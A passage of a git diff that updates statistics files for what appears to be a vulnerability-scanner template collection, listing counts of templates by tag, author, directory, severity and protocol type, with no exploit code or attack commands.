airane","count":1},{"name":"thevillagehacker","count":1},{"name":"idealphase","count":1},{"name":"defr0ggy","count":1},{"name":"ajaysenr","count":1},{"name":"alex","count":1},{"name":"soyelmago","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"yavolo","count":1},{"name":"rtcms","count":1},{"name":"micha3lb3n","count":1},{"name":"mubassirpatel","count":1},{"name":"its0x08","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"retr0","count":1},{"name":"exploitation","count":1},{"name":"bjhulst","count":1},{"name":"th3.d1p4k","count":1},{"name":"b4uh0lz","count":1},{"name":"sullo","count":1},{"name":"bernardofsr","count":1},{"name":"shreyapohekar","count":1},{"name":"apt-mirror","count":1},{"name":"ldionmarcil","count":1},{"name":"hakluke","count":1},{"name":"knassar702","count":1},{"name":"bad5ect0r","count":1},{"name":"wabafet","count":1},{"name":"absshax","count":1},{"name":"c3l3si4n","count":1},{"name":"sshell","count":1}],"directory":[{"name":"cves","count":518},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"network","count":27},{"name":"miscellaneous","count":27},{"name":"iot","count":22},{"name":"fuzzing","count":10},{"name":"dns","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":201},{"name":"low","count":147}],"types":[{"name":"http","count":1566},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} +{"tags":[{"name":"cve","count":512},{"name":"panel","count":202},{"name":"xss","count":182},{"name":"wordpress","count":180},{"name":"exposure","count":176},{"name":"rce","count":174},{"name":"cve2020","count":145},{"name":"lfi","count":143},{"name":"wp-plugin","count":120},{"name":"config","count":90},{"name":"cve2021","count":84},{"name":"cve2019","count":82},{"name":"tech","count":78},{"name":"takeover","count":72},{"name":"","count":66},{"name":"cve2018","count":66},{"name":"token","count":63},{"name":"apache","count":61},{"name":"default-login","count":50},{"name":"iot","count":43},{"name":"cve2017","count":43},{"name":"file","count":42},{"name":"unauth","count":40},{"name":"network","count":35},{"name":"sqli","count":34},{"name":"oob","count":33},{"name":"oracle","count":29},{"name":"workflow","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"ssrf","count":27},{"name":"atlassian","count":26},{"name":"jira","count":26},{"name":"disclosure","count":25},{"name":"cve2016","count":23},{"name":"listing","count":22},{"name":"redirect","count":20},{"name":"aem","count":19},{"name":"cisco","count":17},{"name":"sap","count":16},{"name":"debug","count":14},{"name":"cve2015","count":13},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"misconfig","count":13},{"name":"auth-bypass","count":12},{"name":"adobe","count":12},{"name":"android","count":12},{"name":"weblogic","count":12},{"name":"cve2011","count":11},{"name":"dns","count":11},{"name":"cve2012","count":11},{"name":"zoho","count":11},{"name":"springboot","count":11},{"name":"jenkins","count":10},{"name":"cve2013","count":10},{"name":"dlink","count":10},{"name":"devops","count":10},{"name":"cve2014","count":10},{"name":"php","count":10},{"name":"magento","count":9},{"name":"airflow","count":8},{"name":"aws","count":8},{"name":"cnvd","count":8},{"name":"router","count":8},{"name":"gitlab","count":8},{"name":"rails","count":8},{"name":"ftp","count":8},{"name":"xxe","count":7},{"name":"nginx","count":7},{"name":"vmware","count":7},{"name":"scada","count":7},{"name":"joomla","count":7},{"name":"citrix","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"cms","count":6},{"name":"rconfig","count":6},{"name":"google","count":6},{"name":"backup","count":6},{"name":"jetty","count":6},{"name":"django","count":5},{"name":"ibm","count":5},{"name":"iis","count":5},{"name":"cve2009","count":5},{"name":"ssti","count":5},{"name":"dedecms","count":5},{"name":"dell","count":5},{"name":"lucee","count":5},{"name":"files","count":5},{"name":"circarlife","count":5},{"name":"drupal","count":5},{"name":"confluence","count":5},{"name":"phpmyadmin","count":5},{"name":"login","count":5},{"name":"java","count":5},{"name":"netgear","count":5},{"name":"headless","count":5},{"name":"solr","count":5},{"name":"laravel","count":5},{"name":"ruijie","count":5},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"samsung","count":4},{"name":"magmi","count":4},{"name":"tomcat","count":4},{"name":"hongdian","count":4},{"name":"vpn","count":4},{"name":"moodle","count":4},{"name":"fileupload","count":4},{"name":"jolokia","count":4},{"name":"docker","count":4},{"name":"crlf","count":4},{"name":"elastic","count":4},{"name":"nodejs","count":4},{"name":"thinkphp","count":4},{"name":"webserver","count":4},{"name":"solarwinds","count":4},{"name":"thinkcmf","count":4},{"name":"traversal","count":4},{"name":"mongodb","count":3},{"name":"fanruan","count":3},{"name":"targa","count":3},{"name":"ssh","count":3},{"name":"fpd","count":3},{"name":"kafka","count":3},{"name":"ofbiz","count":3},{"name":"vbulletin","count":3},{"name":"hp","count":3},{"name":"printer","count":3},{"name":"microstrategy","count":3},{"name":"terramaster","count":3},{"name":"r-seenet","count":3},{"name":"git","count":3},{"name":"amazon","count":3},{"name":"resin","count":3},{"name":"ebs","count":3},{"name":"windows","count":3},{"name":"oa","count":3},{"name":"grafana","count":3},{"name":"kubernetes","count":3},{"name":"bypass","count":3},{"name":"deserialization","count":3},{"name":"backups","count":3},{"name":"nacos","count":3},{"name":"openssh","count":3},{"name":"log","count":3},{"name":"cve2010","count":3},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"springcloud","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"kevinlab","count":2},{"name":"spark","count":2},{"name":"splunk","count":2},{"name":"telerik","count":2},{"name":"plesk","count":2},{"name":"sharepoint","count":2},{"name":"bitrix","count":2},{"name":"kibana","count":2},{"name":"couchdb","count":2},{"name":"seeyon","count":2},{"name":"hashicorp","count":2},{"name":"nextjs","count":2},{"name":"cve2007","count":2},{"name":"sonicwall","count":2},{"name":"linkerd","count":2},{"name":"openfire","count":2},{"name":"shellshock","count":2},{"name":"chiyu","count":2},{"name":"globalprotect","count":2},{"name":"frp","count":2},{"name":"icewarp","count":2},{"name":"emerge","count":2},{"name":"ucmdb","count":2},{"name":"wordfence","count":2},{"name":"dos","count":2},{"name":"paloalto","count":2},{"name":"openam","count":2},{"name":"zhiyuan","count":2},{"name":"nexus","count":2},{"name":"rockmongo","count":2},{"name":"mida","count":2},{"name":"sonarqube","count":2},{"name":"strapi","count":2},{"name":"cache","count":2},{"name":"saltstack","count":2},{"name":"rockethchat","count":2},{"name":"xxljob","count":2},{"name":"leak","count":2},{"name":"bigip","count":2},{"name":"vrealize","count":2},{"name":"waf","count":2},{"name":"huawei","count":2},{"name":"jellyfin","count":2},{"name":"glassfish","count":2},{"name":"oauth","count":2},{"name":"showdoc","count":2},{"name":"rstudio","count":2},{"name":"smb","count":2},{"name":"natshell","count":2},{"name":"odoo","count":2},{"name":"jboss","count":2},{"name":"chamilo","count":2},{"name":"kentico","count":2},{"name":"prometheus","count":2},{"name":"idrac","count":2},{"name":"proxy","count":2},{"name":"activemq","count":2},{"name":"microsoft","count":2},{"name":"ecology","count":2},{"name":"voipmonitor","count":2},{"name":"cve2008","count":2},{"name":"fortios","count":2},{"name":"mail","count":2},{"name":"hpe","count":2},{"name":"injection","count":2},{"name":"igs","count":2},{"name":"webcam","count":2},{"name":"flir","count":2},{"name":"zabbix","count":2},{"name":"pega","count":2},{"name":"smtp","count":2},{"name":"service","count":2},{"name":"hjtcloud","count":2},{"name":"trixbox","count":2},{"name":"httpd","count":2},{"name":"yapi","count":2},{"name":"intrusive","count":2},{"name":"maian","count":2},{"name":"nagios","count":2},{"name":"keycloak","count":2},{"name":"checkpoint","count":1},{"name":"mediumish","count":1},{"name":"solman","count":1},{"name":"yii","count":1},{"name":"codeigniter","count":1},{"name":"jnoj","count":1},{"name":"dotclear","count":1},{"name":"pippoint","count":1},{"name":"fuelcms","count":1},{"name":"postmessage","count":1},{"name":"wiki","count":1},{"name":"redcap","count":1},{"name":"emby","count":1},{"name":"clave","count":1},{"name":"idemia","count":1},{"name":"druid","count":1},{"name":"bolt","count":1},{"name":"payara","count":1},{"name":"dotnetnuke","count":1},{"name":"wildfly","count":1},{"name":"floc","count":1},{"name":"postgres","count":1},{"name":"jeewms","count":1},{"name":"flash","count":1},{"name":"monitorr","count":1},{"name":"socomec","count":1},{"name":"favicon","count":1},{"name":"hasura","count":1},{"name":"metinfo","count":1},{"name":"csod","count":1},{"name":"heroku","count":1},{"name":"discourse","count":1},{"name":"nuxeo","count":1},{"name":"totaljs","count":1},{"name":"redis","count":1},{"name":"ambari","count":1},{"name":"exchange","count":1},{"name":"wamp","count":1},{"name":"akkadian","count":1},{"name":"viewpoint","count":1},{"name":"sidekiq","count":1},{"name":"cloudflare","count":1},{"name":"avtech","count":1},{"name":"fiori","count":1},{"name":"visualtools","count":1},{"name":"linksys","count":1},{"name":"cobub","count":1},{"name":"spring","count":1},{"name":"majordomo2","count":1},{"name":"phpfusion","count":1},{"name":"zzzcms","count":1},{"name":"bruteforce","count":1},{"name":"svnserve","count":1},{"name":"panabit","count":1},{"name":"bullwark","count":1},{"name":"geutebruck","count":1},{"name":"concrete","count":1},{"name":"wp-theme","count":1},{"name":"backdoor","count":1},{"name":"viewlinc","count":1},{"name":"mautic","count":1},{"name":"ruckus","count":1},{"name":"rujjie","count":1},{"name":"kong","count":1},{"name":"tileserver","count":1},{"name":"webftp","count":1},{"name":"erp-nc","count":1},{"name":"jsp","count":1},{"name":"xdcms","count":1},{"name":"bookstack","count":1},{"name":"htmli","count":1},{"name":"plone","count":1},{"name":"akamai","count":1},{"name":"trilithic","count":1},{"name":"nps","count":1},{"name":"zend","count":1},{"name":"panos","count":1},{"name":"zm","count":1},{"name":"aspnuke","count":1},{"name":"soar","count":1},{"name":"livezilla","count":1},{"name":"finereport","count":1},{"name":"sprintful","count":1},{"name":"beanshell","count":1},{"name":"netis","count":1},{"name":"rabbitmq","count":1},{"name":"primetek","count":1},{"name":"avalanche","count":1},{"name":"comodo","count":1},{"name":"gloo","count":1},{"name":"haproxy","count":1},{"name":"firebase","count":1},{"name":"commscope","count":1},{"name":"accela","count":1},{"name":"clusterengine","count":1},{"name":"horde","count":1},{"name":"tongda","count":1},{"name":"kubeflow","count":1},{"name":"optiLink","count":1},{"name":"xff","count":1},{"name":"jenkin","count":1},{"name":"fastcgi","count":1},{"name":"gitlist","count":1},{"name":"stem","count":1},{"name":"setup","count":1},{"name":"node","count":1},{"name":"mongoshake","count":1},{"name":"zimbra","count":1},{"name":"rsyncd","count":1},{"name":"krweb","count":1},{"name":"mariadb","count":1},{"name":"opm","count":1},{"name":"k8","count":1},{"name":"openrestry","count":1},{"name":"node-red-dashboard","count":1},{"name":"szhe","count":1},{"name":"sqlite","count":1},{"name":"springframework","count":1},{"name":"lighttpd","count":1},{"name":"jenzabar","count":1},{"name":"cocoon","count":1},{"name":"ricoh","count":1},{"name":"nuuo","count":1},{"name":"cloudinary","count":1},{"name":"moin","count":1},{"name":"uwsgi","count":1},{"name":"octobercms","count":1},{"name":"pulsesecure","count":1},{"name":"webmin","count":1},{"name":"netrc","count":1},{"name":"chevereto","count":1},{"name":"mantisbt","count":1},{"name":"diris","count":1},{"name":"apos","count":1},{"name":"eyou","count":1},{"name":"plugin","count":1},{"name":"klog","count":1},{"name":"grails","count":1},{"name":"glances","count":1},{"name":"fastapi","count":1},{"name":"nomad","count":1},{"name":"moinmoin","count":1},{"name":"swagger","count":1},{"name":"ns","count":1},{"name":"ntopng","count":1},{"name":"mongo","count":1},{"name":"javafaces","count":1},{"name":"netsweeper","count":1},{"name":"rdp","count":1},{"name":"lanproxy","count":1},{"name":"landrayoa","count":1},{"name":"sentry","count":1},{"name":"mirai","count":1},{"name":"2014","count":1},{"name":"wmt","count":1},{"name":"timesheet","count":1},{"name":"ssltls","count":1},{"name":"cse","count":1},{"name":"acme","count":1},{"name":"starttls","count":1},{"name":"selea","count":1},{"name":"visionhub","count":1},{"name":"kafdrop","count":1},{"name":"skywalking","count":1},{"name":"proftpd","count":1},{"name":"dotnet","count":1},{"name":"spectracom","count":1},{"name":"nexusdb","count":1},{"name":"addpac","count":1},{"name":"hiboss","count":1},{"name":"centos","count":1},{"name":"varnish","count":1},{"name":"domxss","count":1},{"name":"xiuno","count":1},{"name":"glpi","count":1},{"name":"status","count":1},{"name":"alibaba","count":1},{"name":"fedora","count":1},{"name":"hortonworks","count":1},{"name":"monitorix","count":1},{"name":"chinaunicom","count":1},{"name":"mysql","count":1},{"name":"vscode","count":1},{"name":"webadmin","count":1},{"name":"ssl","count":1},{"name":"alerta","count":1},{"name":"wifisky","count":1},{"name":"expressjs","count":1},{"name":"webmodule-ee","count":1},{"name":"dlogin","count":1},{"name":"ganglia","count":1},{"name":"nordex","count":1},{"name":"shopware","count":1},{"name":"pacsone","count":1},{"name":"zeroshell","count":1},{"name":"javascript","count":1},{"name":"jsf","count":1},{"name":"empirecms","count":1},{"name":"mdb","count":1},{"name":"kyan","count":1},{"name":"landray","count":1},{"name":"interlib","count":1},{"name":"vsftpd","count":1},{"name":"fortigate","count":1},{"name":"oscommerce","count":1},{"name":"eprints","count":1},{"name":"sco","count":1},{"name":"feifeicms","count":1},{"name":"sceditor","count":1},{"name":"linkedin","count":1},{"name":"pgadmin","count":1},{"name":"sitecore","count":1},{"name":"servicedesk","count":1},{"name":"weiphp","count":1},{"name":"zenario","count":1},{"name":"ruby","count":1},{"name":"spf","count":1},{"name":"hadoop","count":1},{"name":"emc","count":1},{"name":"subrion","count":1},{"name":"iptime","count":1},{"name":"wso2","count":1},{"name":"tpshop","count":1},{"name":"seacms","count":1},{"name":"acexy","count":1},{"name":"cacti","count":1},{"name":"b2evolution","count":1},{"name":"arl","count":1},{"name":"goahead","count":1},{"name":"fortilogger","count":1},{"name":"cve2005","count":1},{"name":"jfrog","count":1},{"name":"parentlink","count":1},{"name":"zcms","count":1},{"name":"mobileiron","count":1},{"name":"upload","count":1},{"name":"discord","count":1},{"name":"fortiweb","count":1},{"name":"episerver","count":1},{"name":"synnefo","count":1},{"name":"traefik","count":1},{"name":"shopxo","count":1},{"name":"huijietong","count":1},{"name":"yachtcontrol","count":1},{"name":"zte","count":1},{"name":"fortinet","count":1},{"name":"email","count":1},{"name":"robomongo","count":1},{"name":"portainer","count":1},{"name":"rmi","count":1},{"name":"tamronos","count":1},{"name":"extractor","count":1},{"name":"mantis","count":1},{"name":"tensorflow","count":1},{"name":"rfi","count":1},{"name":"faraday","count":1},{"name":"vnc","count":1},{"name":"tensorboard","count":1},{"name":"spidercontrol","count":1},{"name":"svn","count":1},{"name":"redhat","count":1},{"name":"bedita","count":1},{"name":"lotuscms","count":1},{"name":"timeclock","count":1},{"name":"sangfor","count":1},{"name":"turbocrm","count":1},{"name":"zmanda","count":1},{"name":"zookeeper","count":1},{"name":"etouch","count":1},{"name":"rhymix","count":1},{"name":"tika","count":1},{"name":"nedi","count":1},{"name":"cors","count":1},{"name":"liferay","count":1},{"name":"phalcon","count":1},{"name":"opentsdb","count":1},{"name":"nette","count":1},{"name":"bitly","count":1},{"name":"expose","count":1},{"name":"npm","count":1},{"name":"doh","count":1},{"name":"openerp","count":1},{"name":"ems","count":1},{"name":"ulterius","count":1},{"name":"mara","count":1},{"name":"phpunit","count":1},{"name":"geddy","count":1},{"name":" default-login","count":1},{"name":"nsasg","count":1},{"name":"dom","count":1},{"name":"woocomernce","count":1},{"name":"rubedo","count":1},{"name":"ueditor","count":1},{"name":"memcached","count":1},{"name":"circontrol","count":1},{"name":"dompdf","count":1},{"name":"openstack","count":1},{"name":"maccmsv10","count":1},{"name":"scimono","count":1},{"name":"redwood","count":1},{"name":"harbor","count":1},{"name":"pagespeed","count":1},{"name":"enumeration","count":1},{"name":"wuzhicms","count":1},{"name":"smartsense","count":1},{"name":"biometrics","count":1},{"name":"manageengine","count":1},{"name":"lansweeper","count":1},{"name":"saltapi","count":1},{"name":"gogs","count":1},{"name":"magicflow","count":1},{"name":"xml","count":1},{"name":"labtech","count":1},{"name":"circontrorl","count":1},{"name":"upnp","count":1},{"name":"opensmtpd","count":1},{"name":"embedthis","count":1},{"name":"wavlink","count":1},{"name":"csrf","count":1},{"name":"lancom","count":1},{"name":"scs","count":1},{"name":"lutron","count":1},{"name":"h3c-imc","count":1},{"name":"calendarix","count":1},{"name":"aura","count":1},{"name":"wavemaker","count":1},{"name":"kerbynet","count":1},{"name":"servicenow","count":1},{"name":"plastic","count":1},{"name":"drone","count":1},{"name":"dvwa","count":1},{"name":"crm","count":1},{"name":"expn","count":1},{"name":"jitsi","count":1},{"name":"xunchi","count":1},{"name":"flink","count":1},{"name":"db","count":1},{"name":"ilo4","count":1},{"name":"tenda","count":1},{"name":"websvn","count":1},{"name":"gridx","count":1},{"name":"anchorcms","count":1},{"name":"apiman","count":1},{"name":"bash","count":1},{"name":"exacqvision","count":1},{"name":"grav","count":1},{"name":"jquery","count":1},{"name":"dvr","count":1},{"name":"duomicms","count":1},{"name":"alertmanager","count":1},{"name":"myucms","count":1},{"name":"tapestry","count":1},{"name":"codemeter","count":1},{"name":"ecom","count":1},{"name":"wazuh","count":1},{"name":"xmlchart","count":1},{"name":"azure","count":1},{"name":"gateone","count":1},{"name":"octoprint","count":1},{"name":"salesforce","count":1},{"name":"javamelody","count":1},{"name":"phpinfo","count":1},{"name":"axis","count":1},{"name":"mpsec","count":1},{"name":"appweb","count":1},{"name":"opencast","count":1},{"name":"esmtp","count":1},{"name":"sarg","count":1},{"name":"fortigates","count":1},{"name":"thinkadmin","count":1},{"name":"itop","count":1},{"name":"blind","count":1},{"name":"symfony","count":1},{"name":"zarafa","count":1},{"name":"razor","count":1},{"name":"jmx","count":1},{"name":"mailchimp","count":1},{"name":"74cms","count":1},{"name":"enum","count":1},{"name":"netdata","count":1},{"name":"k8s","count":1},{"name":"st","count":1},{"name":"blue-ocean","count":1},{"name":"vsphere","count":1},{"name":"mcafee","count":1},{"name":"triconsole","count":1},{"name":"blackboard","count":1},{"name":"wooyun","count":1},{"name":"clockwatch","count":1},{"name":"realteo","count":1},{"name":"plc","count":1},{"name":"pyramid","count":1},{"name":"rmc","count":1},{"name":"adminer","count":1},{"name":"darkstat","count":1},{"name":"keenetic","count":1},{"name":"cgi","count":1},{"name":"ioncube","count":1},{"name":"nc2","count":1},{"name":"webui","count":1},{"name":"powercreator","count":1},{"name":"opensns","count":1},{"name":"ec2","count":1}],"authors":[{"name":"dhiyaneshdk","count":220},{"name":"pikpikcu","count":195},{"name":"pdteam","count":187},{"name":"dwisiswant0","count":126},{"name":"geeknik","count":119},{"name":"daffainfo","count":99},{"name":"madrobot","count":60},{"name":"princechaddha","count":52},{"name":"gy741","count":49},{"name":"gaurang","count":42},{"name":"pussycat0x","count":34},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":20},{"name":"sheikhrishad","count":15},{"name":"philippedelteil","count":14},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"random_robbie","count":10},{"name":"righettod","count":9},{"name":"wdahlenb","count":9},{"name":"melbadry9","count":8},{"name":"aashiq","count":8},{"name":"nadino","count":8},{"name":"iamthefrogy","count":8},{"name":"that_juan_","count":8},{"name":"hackergautam","count":8},{"name":"dr_set","count":7},{"name":"0x240x23elu","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"harshbothra_","count":7},{"name":"techryptic (@tech)","count":7},{"name":"oppsec","count":7},{"name":"r3dg33k","count":7},{"name":"emadshanab","count":7},{"name":"__fazal","count":6},{"name":"caspergn","count":6},{"name":"puzzlepeaches","count":6},{"name":"panch0r3d","count":5},{"name":"ganofins","count":5},{"name":"pentest_swissky","count":5},{"name":"yanyun","count":5},{"name":"joanbono","count":5},{"name":"e_schultze_","count":4},{"name":"elsfa7110","count":4},{"name":"github.com/its0x08","count":4},{"name":"xelkomy","count":4},{"name":"nodauf","count":4},{"name":"rootxharsh","count":4},{"name":"iamnoooob","count":4},{"name":"meme-lord","count":4},{"name":"mavericknerd","count":3},{"name":"dudez","count":3},{"name":"impramodsargar","count":3},{"name":"_generic_human_","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"0w4ys","count":3},{"name":"jarijaas","count":3},{"name":"f1tz","count":3},{"name":"fyoorer","count":3},{"name":"thomas_from_offensity","count":3},{"name":"tess","count":3},{"name":"z3bd","count":3},{"name":"binaryfigments","count":3},{"name":"shine","count":3},{"name":"manas_harsh","count":2},{"name":"lotusdll","count":2},{"name":"ehsahil","count":2},{"name":"bing0o","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"randomrobbie","count":2},{"name":"vavkamil","count":2},{"name":"moritz nentwig","count":2},{"name":"gevakun","count":2},{"name":"afaq","count":2},{"name":"0xsapra","count":2},{"name":"0xrudra","count":2},{"name":"hetroublemakr","count":2},{"name":"foulenzer","count":2},{"name":"shifacyclewala","count":2},{"name":"bsysop","count":2},{"name":"davidmckennirey","count":2},{"name":"joeldeleep","count":2},{"name":"0xprial","count":2},{"name":"swissky","count":2},{"name":"w4cky_","count":2},{"name":"nkxxkn","count":2},{"name":"fabaff","count":2},{"name":"amsda","count":2},{"name":"incogbyte","count":2},{"name":"unstabl3","count":2},{"name":"kiblyn11","count":2},{"name":"0xcrypto","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"lu4nx","count":2},{"name":"x1m_martijn","count":2},{"name":"random-robbie","count":2},{"name":"pxmme1337","count":2},{"name":"emenalf","count":2},{"name":"bp0lr","count":2},{"name":"dheerajmadhukar","count":2},{"name":"udit_thakkur","count":2},{"name":"koti2","count":2},{"name":"ree4pwn","count":2},{"name":"vzamanillo","count":1},{"name":"akshansh","count":1},{"name":"tirtha_mandal","count":1},{"name":"luci","count":1},{"name":"johnk3r","count":1},{"name":"akash.c","count":1},{"name":"thezakman","count":1},{"name":"s1r1u5_","count":1},{"name":"vsh00t","count":1},{"name":"sullo","count":1},{"name":"blckraven","count":1},{"name":"c3l3si4n","count":1},{"name":"smaranchand","count":1},{"name":"mohammedsaneem","count":1},{"name":"aceseven (digisec360)","count":1},{"name":"dogasantos","count":1},{"name":"shelld3v","count":1},{"name":"revblock","count":1},{"name":"petruknisme","count":1},{"name":"un-fmunozs","count":1},{"name":"b0yd","count":1},{"name":"streetofhackerr007 (rohit soni)","count":1},{"name":"ipanda","count":1},{"name":"0xtavian","count":1},{"name":"bernardofsr","count":1},{"name":"jteles","count":1},{"name":"ohlinge","count":1},{"name":"regala_","count":1},{"name":"notsoevilweasel","count":1},{"name":"andysvints","count":1},{"name":"whynotke","count":1},{"name":"undefl0w","count":1},{"name":"johnjhacking","count":1},{"name":"gboddin","count":1},{"name":"gal nagli","count":1},{"name":"0xrod","count":1},{"name":"fopina","count":1},{"name":"andirrahmani1","count":1},{"name":"sicksec","count":1},{"name":"makyotox","count":1},{"name":"rojanrijal","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"sshell","count":1},{"name":"d0rkerdevil","count":1},{"name":"bjhulst","count":1},{"name":"taielab","count":1},{"name":"mubassirpatel","count":1},{"name":"rtcms","count":1},{"name":"abison_binoy","count":1},{"name":"sushant kamble (https://in.linkedin.com/in/sushantkamble)","count":1},{"name":"r3naissance","count":1},{"name":"exploitation","count":1},{"name":"b4uh0lz","count":1},{"name":"remonsec","count":1},{"name":"micha3lb3n","count":1},{"name":"rodnt","count":1},{"name":"shreyapohekar","count":1},{"name":"aresx","count":1},{"name":"deena","count":1},{"name":"kabirsuda","count":1},{"name":"j33n1k4","count":1},{"name":"arcc","count":1},{"name":"pdp","count":1},{"name":"kba@sogeti_esec","count":1},{"name":"zandros0","count":1},{"name":"affix","count":1},{"name":"nytr0gen","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"dawid czarnecki","count":1},{"name":"tim_koopmans","count":1},{"name":"ahmed sherif","count":1},{"name":"bernardo rodrigues @bernardofsr | andré monteiro @am0nt31r0","count":1},{"name":"bolli95","count":1},{"name":"berkdusunur","count":1},{"name":"jeya seelan","count":1},{"name":"apt-mirror","count":1},{"name":"mhdsamx","count":1},{"name":"divya_mudgal","count":1},{"name":"omarkurt","count":1},{"name":"ajaysenr","count":1},{"name":"becivells","count":1},{"name":"toufik airane","count":1},{"name":"furkansenan","count":1},{"name":"kishore krishna (sillydaddy)","count":1},{"name":"kurohost","count":1},{"name":"mah3sec_","count":1},{"name":"ringo","count":1},{"name":"schniggie","count":1},{"name":"streetofhackerr007","count":1},{"name":"cookiehanhoan","count":1},{"name":"th3.d1p4k","count":1},{"name":"raesene","count":1},{"name":"@dwisiswant0","count":1},{"name":"retr0","count":1},{"name":"0xteles","count":1},{"name":"daviey","count":1},{"name":"hanlaomo","count":1},{"name":"sy3omda","count":1},{"name":"pudsec","count":1},{"name":"hakluke","count":1},{"name":"bad5ect0r","count":1},{"name":"@github.com/defr0ggy","count":1},{"name":"willd96","count":1},{"name":"thevillagehacker","count":1},{"name":"naglinagli","count":1},{"name":"alifathi-h1","count":1},{"name":"chron0x","count":1},{"name":"absshax","count":1},{"name":"_harleo","count":1},{"name":"yashgoti","count":1},{"name":"kareemse1im","count":1},{"name":"qlkwej","count":1},{"name":"soyelmago","count":1},{"name":"alperenkesk","count":1},{"name":"manuelbua","count":1},{"name":"wabafet","count":1},{"name":"noamrathaus","count":1},{"name":"geraldino2","count":1},{"name":"elmahdi","count":1},{"name":"ldionmarcil","count":1},{"name":"iampritam","count":1},{"name":"shifacyclewla","count":1},{"name":"patralos","count":1},{"name":"yashanand155","count":1},{"name":"sickwell","count":1},{"name":"luskabol","count":1},{"name":"0ut0fb4nd","count":1},{"name":"yavolo","count":1},{"name":"ooooooo_q","count":1},{"name":"defr0ggy","count":1},{"name":"_c0wb0y_","count":1},{"name":"its0x08","count":1},{"name":"ratnadip gajbhiye","count":1},{"name":"manikanta a.k.a @secureitmania","count":1},{"name":"co0nan","count":1},{"name":"knassar702","count":1},{"name":"flag007","count":1},{"name":"fmunozs","count":1},{"name":"zhenwarx","count":1},{"name":"alph4byt3","count":1},{"name":"sid ahmed malaoui @ realistic security","count":1},{"name":"juicypotato1","count":1},{"name":"52971","count":1},{"name":"alex","count":1},{"name":"0h1in9e","count":1},{"name":"_darrenmartyn","count":1},{"name":"ivo palazzolo (@palaziv)","count":1},{"name":"ilovebinbash","count":1},{"name":"idealphase","count":1},{"name":"g4l1t0 and @convisoappsec","count":1}],"directory":[{"name":"cves","count":519},{"name":"vulnerabilities","count":246},{"name":"exposed-panels","count":204},{"name":"exposures","count":168},{"name":"technologies","count":136},{"name":"misconfiguration","count":115},{"name":"takeovers","count":70},{"name":"default-logins","count":49},{"name":"file","count":42},{"name":"workflows","count":34},{"name":"miscellaneous","count":27},{"name":"network","count":27},{"name":"iot","count":22},{"name":"dns","count":10},{"name":"fuzzing","count":10},{"name":"cnvd","count":9},{"name":"headless","count":5},{"name":".pre-commit-config.yaml","count":1}],"severity":[{"name":"info","count":535},{"name":"high","count":426},{"name":"medium","count":349},{"name":"critical","count":202},{"name":"low","count":147}],"types":[{"name":"http","count":1567},{"name":"file","count":42},{"name":"network","count":35},{"name":"dns","count":10}]} diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md index f99c983619..933dc9f670 100644 --- a/TEMPLATES-STATS.md +++ b/TEMPLATES-STATS.md @@ -1,643 +1,644 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |--------------------|-------|--------------------------------------------|-------|-------------------------|-------|----------|-------|---------|-------| -| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 | +| cve | 512 | dhiyaneshdk | 220 | cves | 519 | info | 535 | http | 1567 | | panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 | | xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 | -| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 | +| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 202 | dns | 10 | | exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | | -| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | | +| rce | 174 | daffainfo | 99 | misconfiguration | 115 | | | | | | cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | | | lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | | -| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | | +| wp-plugin | 120 | gy741 | 49 | file | 42 | | | | | | config | 90 | gaurang | 42 | workflows | 34 | | | | | -| cve2021 | 83 | pussycat0x | 34 | miscellaneous | 27 | | | | | -| cve2019 | 82 | ice3man | 26 | network | 27 | | | | | +| cve2021 | 84 | pussycat0x | 34 | network | 27 | | | | | +| cve2019 | 82 | ice3man | 26 | miscellaneous | 27 | | | | | | tech | 78 | organiccrap | 24 | iot | 22 | | | | | -| takeover | 72 | 0x_akoko | 20 | fuzzing | 10 | | | | | -| cve2018 | 66 | sheikhrishad | 15 | dns | 10 | | | | | -| | 66 | milo2012 | 14 | cnvd | 9 | | | | | -| token | 63 | philippedelteil | 14 | headless | 5 | | | | | +| takeover | 72 | 0x_akoko | 20 | dns | 10 | | | | | +| cve2018 | 66 | sheikhrishad | 15 | fuzzing | 10 | | | | | +| | 66 | philippedelteil | 14 | cnvd | 9 | | | | | +| token | 63 | milo2012 | 14 | headless | 5 | | | | | | apache | 61 | pr3r00t | 13 | 